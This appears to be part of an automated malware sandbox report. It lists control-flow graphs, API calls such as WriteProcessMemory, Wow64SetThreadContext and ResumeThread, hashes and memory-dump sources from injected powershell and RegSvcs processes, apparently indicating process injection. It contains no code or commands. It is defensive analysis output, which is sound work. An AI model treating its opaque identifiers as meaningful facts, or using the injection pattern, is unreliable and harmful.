                                                        • Opcode Fuzzy Hash: 27baa6ae218e56ba954fd192e75c1e86e8b145942710c936c5a313c3d6b58376
                                                        • Instruction Fuzzy Hash: 17C1BA32E4C6934FE712EAACECA95ED77A0EF51264B180277D098CB0D3DE1C644786D1

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 704 7ff8879ffe3f-7ff8879ffe78 705 7ff887a00244-7ff887a0030d 704->705 706 7ff8879ffe7e-7ff8879ffe8f 704->706 718 7ff887a00317-7ff887a0031c 705->718 719 7ff887a0030f-7ff887a00314 705->719 706->705 707 7ff8879ffe95-7ff8879ffeac 706->707 707->705 708 7ff8879ffeb2-7ff8879ffec8 707->708 708->705 710 7ff8879ffece-7ff8879fff02 708->710 710->705 712 7ff8879fff08-7ff8879fff18 710->712 712->705 713 7ff8879fff1e-7ff8879fff34 712->713 713->705 715 7ff8879fff3a-7ff8879fff4e 713->715 715->705 717 7ff8879fff54-7ff8879fff7c 715->717 717->705 720 7ff887a00323-7ff887a00352 Wow64SetThreadContext 718->720 719->718 721 7ff887a00354 720->721 722 7ff887a0035a-7ff887a00389 720->722 721->722
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1418736990.00007FF8879F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff8879f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 2a3b4600b9b831db0b272b1f0c42cf764d91d5fb169a70709cedbae142066fa9
                                                        • Instruction ID: 85ad8a78514ab1719511fbde708aaeec99fc92288f5863128ec05cccd6981b84
                                                        • Opcode Fuzzy Hash: 2a3b4600b9b831db0b272b1f0c42cf764d91d5fb169a70709cedbae142066fa9
                                                        • Instruction Fuzzy Hash: 52917631E0CB940FC71D9A2C48562B97BE2EB8A311B1985BFC19BC7193DD28A807C781

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1418736990.00007FF8879F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff8879f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fea01e818381291e2bfe987ce78f2d27dd62961cc94f37f2e7b24e914085f891
                                                        • Instruction ID: 8f6378f57ebb0fa6fd02d772bbf8ca3b84acfd6741cecfdbdd585cad4f2e365e
                                                        • Opcode Fuzzy Hash: fea01e818381291e2bfe987ce78f2d27dd62961cc94f37f2e7b24e914085f891
                                                        • Instruction Fuzzy Hash: 3E91C932E0C7974FE706EBACA8996ED77A0EF52264B180277D098CB0D3DA1C6446C7D1

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1418736990.00007FF8879F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff8879f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 839288e50510f719d986436ca3ab4daa76d132f01267e10869966f7421847629
                                                        • Instruction ID: 6d9d89a9f41a778b07d22e0551dca6dc6f44dccfb0ae7b0fe87fd91ca6ec7009
                                                        • Opcode Fuzzy Hash: 839288e50510f719d986436ca3ab4daa76d132f01267e10869966f7421847629
                                                        • Instruction Fuzzy Hash: 1C81163190CB844FD71ADB6888566B97FF1EF96310F1945BFD08AC7197DA38A806C742

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1418736990.00007FF8879F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff8879f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 87e58bbe88f739b8b29537eada87c2d45c1ffc5a1ce0312d68c1be50caff106f
                                                        • Instruction ID: 6a8e97a7334b7d6daf660c2cfc5e4af94ebcfca824dad303eea39e859eb46cea
                                                        • Opcode Fuzzy Hash: 87e58bbe88f739b8b29537eada87c2d45c1ffc5a1ce0312d68c1be50caff106f
                                                        • Instruction Fuzzy Hash: 3B512A3190C7844FD71ADB6498966A97FF1EF57310F0981BFD08AC7197DA38580AC752

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 860 7ff887a00494-7ff887a0049b 861 7ff887a004a6-7ff887a00535 860->861 862 7ff887a0049d-7ff887a004a5 860->862 865 7ff887a00537-7ff887a0053c 861->865 866 7ff887a0053f-7ff887a00594 WriteProcessMemory 861->866 862->861 865->866 868 7ff887a00596 866->868 869 7ff887a0059c-7ff887a005cd 866->869 868->869
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1418736990.00007FF8879F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff8879f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: b46743583c4a7173fb8b6ee0c1750ce213833b96660aaa751c8d85d265b0778e
                                                        • Instruction ID: e040a4268d53a20f3ba652f7fbc722d3dc8bd1fd10f1946190edff3452ce0cf9
                                                        • Opcode Fuzzy Hash: b46743583c4a7173fb8b6ee0c1750ce213833b96660aaa751c8d85d265b0778e
                                                        • Instruction Fuzzy Hash: 2741C531D1CB588FDB189F9898466FDBBE1FB55310F00426FE489D3292DA74A845CB92

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 871 7ff887a0021b-7ff887a00220 872 7ff887a00266-7ff887a0030d 871->872 873 7ff887a00222-7ff887a00225 871->873 877 7ff887a00317-7ff887a0031c 872->877 878 7ff887a0030f-7ff887a00314 872->878 873->872 879 7ff887a00323-7ff887a00352 Wow64SetThreadContext 877->879 878->877 880 7ff887a00354 879->880 881 7ff887a0035a-7ff887a00389 879->881 880->881
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1418736990.00007FF8879F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff8879f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5d3c039187d2fffa03a8f209cebad9ac6aa118186d17d3a1d1175cc4574b4622
                                                        • Instruction ID: cd88978e42e8afb3ff0f91f2cbfa066e824f35d05f0a55342775a2167b54a9f7
                                                        • Opcode Fuzzy Hash: 5d3c039187d2fffa03a8f209cebad9ac6aa118186d17d3a1d1175cc4574b4622
                                                        • Instruction Fuzzy Hash: ED411B31D0DB848FD719DBA898466A97FF1EF56310F0841BFD089C7193DB286805C792

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 883 7ff8879fd348-7ff8879ffcd4 ResumeThread 893 7ff8879ffcd6 883->893 894 7ff8879ffcdc-7ff8879ffd01 883->894 893->894
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1418736990.00007FF8879F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff8879f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: edacdca79bffae0f918220df6cd8accae48c6384c3ef1afd41739193264e2d18
                                                        • Instruction ID: 4b3c33d00ecd31e70f0237b7e835223ab068bb1f7848ef13195a0e4e4ddd40ce
                                                        • Opcode Fuzzy Hash: edacdca79bffae0f918220df6cd8accae48c6384c3ef1afd41739193264e2d18
                                                        • Instruction Fuzzy Hash: 5631F23190D7498FDB49EFA8884A7FDBBE0EF56320F0441AFD049C71A3DA689406CB52

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 896 7ff8879ffbf9-7ff8879ffcd4 ResumeThread 902 7ff8879ffcd6 896->902 903 7ff8879ffcdc-7ff8879ffd01 896->903 902->903
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1418736990.00007FF8879F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff8879f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 78057639222317dd000ed7d7fde737a7657056ca2eb9bac658bc7ce075200dfa
                                                        • Instruction ID: 4b8781fead754ec43b0ae10b7a3939022d93afea9ed2f0b296333d461e7f367a
                                                        • Opcode Fuzzy Hash: 78057639222317dd000ed7d7fde737a7657056ca2eb9bac658bc7ce075200dfa
                                                        • Instruction Fuzzy Hash: E331D67190D7884FDB59DBA8884A7ED7BF0EF56320F0441AFD049C71A3DA68980ACB52

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 905 7ff8879fd360-7ff8879ffcd4 ResumeThread 911 7ff8879ffcd6 905->911 912 7ff8879ffcdc-7ff8879ffd01 905->912 911->912
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1418736990.00007FF8879F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff8879f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: cc72865d57999b2c34489e99aa67115187f89120aff327912afc414a32d98e90
                                                        • Instruction ID: 5a5e99548dc57da155e93e87888ddabba8ec443afceb84b5955736b28b47409b
                                                        • Opcode Fuzzy Hash: cc72865d57999b2c34489e99aa67115187f89120aff327912afc414a32d98e90
                                                        • Instruction Fuzzy Hash: 8131C57090DA488FDB59DBA8884A7FDBBE0EF55320F0441AFD04AC7162DA685406CB51

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 914 7ff887a002a8-7ff887a0030d 918 7ff887a00317-7ff887a00352 Wow64SetThreadContext 914->918 919 7ff887a0030f-7ff887a00314 914->919 921 7ff887a00354 918->921 922 7ff887a0035a-7ff887a00389 918->922 919->918 921->922
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1418736990.00007FF8879F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff8879f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 2e9cd981dd7c2c97513a4b93210367f138d2fcab539165187acbbeafc13ec9ca
                                                        • Instruction ID: 1bef5193d4d769da11e6e76e451c4565ebfe532eae3473c6c2a97c5f9b8df085
                                                        • Opcode Fuzzy Hash: 2e9cd981dd7c2c97513a4b93210367f138d2fcab539165187acbbeafc13ec9ca
                                                        • Instruction Fuzzy Hash: 4B31B031D0CB588FDB28EFA8984A6FE7BE1EB55311F04462ED04AD3192DB74A8058B81
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1418736990.00007FF8879F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff8879f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0#L
                                                        • API String ID: 0-2519268996
                                                        • Opcode ID: f5f29dc1484fa0cfa1ec37db869d5188d644e0c7f871018cd91f0ea8b65b525d
                                                        • Instruction ID: da12e72a182708823f8446305b05e4338f4857ea3536bbb8d1d2db01aa6a19e1
                                                        • Opcode Fuzzy Hash: f5f29dc1484fa0cfa1ec37db869d5188d644e0c7f871018cd91f0ea8b65b525d
                                                        • Instruction Fuzzy Hash: CDF1A130A0D98A4FEB99EB28D859BBD77E1FF56350F0401B9D04EC72A3DE29A841C741
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1418736990.00007FF8879F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff8879f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: "9B
                                                        • API String ID: 0-314156292
                                                        • Opcode ID: c2bbc37cb50ba5a9eb9c5152f0ff23cca1eebf6bbffed065c65cb3038e31693f
                                                        • Instruction ID: 74e3c763d10913bbc6e99f3b74a0f222ec640ced8e949a74014764c918420c20
                                                        • Opcode Fuzzy Hash: c2bbc37cb50ba5a9eb9c5152f0ff23cca1eebf6bbffed065c65cb3038e31693f
                                                        • Instruction Fuzzy Hash: CE31177194D7860FE319DA749C1A179BFA5FF83260B0542FFD08AC71A3EA1C58078392
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: abfb8ebd0d40ea274617d8d188edc96aced5d688ee27e413df58497bc6650b34
                                                        • Instruction ID: 7817d4f7224500231f75bccdff8e8d6c1f63b774127490eecbb9372be4e3fd49
                                                        • Opcode Fuzzy Hash: abfb8ebd0d40ea274617d8d188edc96aced5d688ee27e413df58497bc6650b34
                                                        • Instruction Fuzzy Hash: 49F2C5746001168FC754DF28E5A1FAA73E2FF89700F6141B9940EAB37ACB79AD41DB90
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 89cf9e05630be20aa8c40f0d945551878b2c9009b1bcf10e73271887dcb657b6
                                                        • Instruction ID: 03adc6d0c6f3b5d5c0c2fe9d6ea40839befe82af444901d0711b431bee67d7c8
                                                        • Opcode Fuzzy Hash: 89cf9e05630be20aa8c40f0d945551878b2c9009b1bcf10e73271887dcb657b6
                                                        • Instruction Fuzzy Hash: 5BF2C5746001168FC754DF28E5A1FAA73E2FF89700F6141B9940EAB37ACB79AD41DB90
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4173eae820760cc237c889336600b5b894e3432952bdc1befe43f1ed02a694a7
                                                        • Instruction ID: 3620160ede94f57bd22952163fefeb9e143a32d42bcf2437f491921a41def50e
                                                        • Opcode Fuzzy Hash: 4173eae820760cc237c889336600b5b894e3432952bdc1befe43f1ed02a694a7
                                                        • Instruction Fuzzy Hash: AA724B746101168FD715EF68D590AAE7BF6FF88304F248025E906AB3A5DF7CAC46CB90
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 039d28823c7d1675209adddcd3b8ed9491e0bb712f86ba0f966636b74d6f0b91
                                                        • Instruction ID: 9a97dee95ca874a839a8af849fcca73fb40b1226097c74c098fa697d991f6f7d
                                                        • Opcode Fuzzy Hash: 039d28823c7d1675209adddcd3b8ed9491e0bb712f86ba0f966636b74d6f0b91
                                                        • Instruction Fuzzy Hash: ED527074710205CFCB54DFA4D594A6EBBB2FBC8304F608069DA06AB394DF39AC46DB91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 81479e4a9910353c107c14e9c8a120327c592a0d79e74f2d3f43660a0c25bc26
                                                        • Instruction ID: 627ebd6764a808192ed19b67cee1fee2c7da7bb74d17696b0335f3b0f13ad044
                                                        • Opcode Fuzzy Hash: 81479e4a9910353c107c14e9c8a120327c592a0d79e74f2d3f43660a0c25bc26
                                                        • Instruction Fuzzy Hash: D4521435A105189FDB15DFA8D984EA9BBF2FF88314F1581A8E549AB272CB31EC51CF40
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3eca4015d54e680e63f47403322c3d5d26e77725c587a0a535ddaf680004b6dd
                                                        • Instruction ID: 9c7dd3b2fb5d0c0be9c190a1130f02d0cb664c7c435becf21ce01fdff47c264b
                                                        • Opcode Fuzzy Hash: 3eca4015d54e680e63f47403322c3d5d26e77725c587a0a535ddaf680004b6dd
                                                        • Instruction Fuzzy Hash: 4E328C74A106088FDB64DF64D994AAEBBF2FF88300F608169D50AA7394DF35AC45CF91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 87063dfc09a4e0845b935673abdac7dc9e67f99f6a3c3ede0abf41ecec73df28
                                                        • Instruction ID: 379bbca6a25e36bfe039ed7624d02e412762100c234d3068299db8308b37a18c
                                                        • Opcode Fuzzy Hash: 87063dfc09a4e0845b935673abdac7dc9e67f99f6a3c3ede0abf41ecec73df28
                                                        • Instruction Fuzzy Hash: 26327274A00219DFDB25DF64D954BAEB7B6FB88300F2480A5E909AB394DF389D41CF90
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 070fc281002d547780fddaa220447794f11758891eefd059757e717323d36e0d
                                                        • Instruction ID: 4eaae0f356699706e931b5f288a86bc60a72de78c9919fda648f5cb15c6ad151
                                                        • Opcode Fuzzy Hash: 070fc281002d547780fddaa220447794f11758891eefd059757e717323d36e0d
                                                        • Instruction Fuzzy Hash: 48124D34B003098FDB15EFA4D9989AEB7B2FB89300F608139D60667394DF799D45DB90
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 86b615220733e0dd32615a0d60282f6c474b4c7d982ba3f62901fda923145504
                                                        • Instruction ID: 56b920f939e38544edd0accbc36a5bdb9169b1e515a52805a3294ba2364a99e0
                                                        • Opcode Fuzzy Hash: 86b615220733e0dd32615a0d60282f6c474b4c7d982ba3f62901fda923145504
                                                        • Instruction Fuzzy Hash: 1FF1B031A01300AFCB55DF29D580A9ABBF6FF56718F1590A9D801AB762C736FC02DB90
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 853f7ed7b195ec494ed8d135d0663c00d36752672d99ceda87187aed2bed04d7
                                                        • Instruction ID: d7325d1be6a2cb96c40d542802d4a2010d0cef0c266c696aa6a76f43d934979c
                                                        • Opcode Fuzzy Hash: 853f7ed7b195ec494ed8d135d0663c00d36752672d99ceda87187aed2bed04d7
                                                        • Instruction Fuzzy Hash: 6FC1D4347041168FC758EF28D594A6E77E2FF88740F1181B9D40AAB3A5DF79AD42CB81
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e175793cf041cc1cf79d66ac26e16c43ee55364d5b8ec2d45acb29204c570f4c
                                                        • Instruction ID: 3daf7df2a20f5185af26efd406f5b2f65bdc1895801e8197ece328bdc500017c
                                                        • Opcode Fuzzy Hash: e175793cf041cc1cf79d66ac26e16c43ee55364d5b8ec2d45acb29204c570f4c
                                                        • Instruction Fuzzy Hash: 0BC1E5347001568FC758EF28D598A6E77E2FF88340F1181B9D40AAB3A5DF78AD42CB81
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2ed1ff0c738b40b453c4b6bd2d12442270b3351ab526cf589b458fb72bf084fb
                                                        • Instruction ID: 495d4dcf325382b94aa62a18fac2074e43e0e3c9e847c0eba3ccf91e438fbdb8
                                                        • Opcode Fuzzy Hash: 2ed1ff0c738b40b453c4b6bd2d12442270b3351ab526cf589b458fb72bf084fb
                                                        • Instruction Fuzzy Hash: EBB16D70E002098FDF28CFA9D9857AEBBF2BF88704F149129D816A7394EB749855CF51
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f140c6f0c2958cd69621c2c72b2ad3779d9e3e7437b70a08a74396080725ea1a
                                                        • Instruction ID: 3dbae110c621000aaf9cd4e6beda69aefa33a088711de855e53b897c576c96c1
                                                        • Opcode Fuzzy Hash: f140c6f0c2958cd69621c2c72b2ad3779d9e3e7437b70a08a74396080725ea1a
                                                        • Instruction Fuzzy Hash: E6B18E70E002198FDF18CFA8C8857AEBBF2BF88714F14D129D815AB794EB749851CB91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0865910a07a75605484129b5b779f0d31dbd5e9ed321e1c4ae04e5c28f3af31c
                                                        • Instruction ID: aa94eda1f38e67be9f97ba678f46786ce4b60e81e2fe2840f7bcf311055af92f
                                                        • Opcode Fuzzy Hash: 0865910a07a75605484129b5b779f0d31dbd5e9ed321e1c4ae04e5c28f3af31c
                                                        • Instruction Fuzzy Hash: 2CA1D6347001568FC758EF28D594A6E77E2FF88340F1181B9D40AAB3A5DB79AD42CF81
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8c8872d9586fbb772d14960dc35b02e43eb6f1d47af5c98bb2c5be8e55e20316
                                                        • Instruction ID: 6d0db2cce089093010016dd144a3e387612cbba114a1d72d255c69035e0fcc4e
                                                        • Opcode Fuzzy Hash: 8c8872d9586fbb772d14960dc35b02e43eb6f1d47af5c98bb2c5be8e55e20316
                                                        • Instruction Fuzzy Hash: 56918070E002099FDF24CFA8C8847AEBBF2BF98714F149529D416A7794EB749842CF95
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bf23923b58f4e12d72b879085762e128636a01a3076a738dbae9a3896d97ecc3
                                                        • Instruction ID: 6fe3496294269476026de08402203cd908b0df25e7982a1c003663cc2e156bca
                                                        • Opcode Fuzzy Hash: bf23923b58f4e12d72b879085762e128636a01a3076a738dbae9a3896d97ecc3
                                                        • Instruction Fuzzy Hash: 21613971E42A458BD748DF6AE88069ABBF3FFC8200B04C579C404EB365EBB95D158F51
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2928bf2fc308e68ac0bf91cfd3e7cf5fd73fcbb36af2df5ec3d70202caf33e3a
                                                        • Instruction ID: 6de8f6ba3c8dbc06ed706ce5fa7c08441cf1da016b410df8c29e380372edee4d
                                                        • Opcode Fuzzy Hash: 2928bf2fc308e68ac0bf91cfd3e7cf5fd73fcbb36af2df5ec3d70202caf33e3a
                                                        • Instruction Fuzzy Hash: 90513A71E42A498BD748DF6BE88069ABBE3FBC8200F04C579C005EB365EBB95D158F51
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ,k%q$,k%q$,k%q$,k%q
                                                        • API String ID: 0-3114898579
                                                        • Opcode ID: 41d4d3f0a770b96c464ee70895335dc4df5bf61aa40987d258853a8e130ac238
                                                        • Instruction ID: a7f401198532337ce600474df32d2c68020fdd0cf96263a3cd88da1caf925a12
                                                        • Opcode Fuzzy Hash: 41d4d3f0a770b96c464ee70895335dc4df5bf61aa40987d258853a8e130ac238
                                                        • Instruction Fuzzy Hash: B9628B34B106198BE759EF68D554B6FBBA2FBC8304F608469D506EB394CF389C068F91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: B.~$UKSP${q9y$D3E
                                                        • API String ID: 0-48519639
                                                        • Opcode ID: 64c89619f87606065fccced5ef7688a100f0aa0c1009acefd4572a1b382e90f4
                                                        • Instruction ID: 2f494550eecd10f606472606839593d993dad7a86db76a24fa808ba5b548c74d
                                                        • Opcode Fuzzy Hash: 64c89619f87606065fccced5ef7688a100f0aa0c1009acefd4572a1b382e90f4
                                                        • Instruction Fuzzy Hash: 1CB154B0815B818FC359CF1A8189AE5BBE0BF89314F5A85FAC15D9F232EB358445CF81
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800680499.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
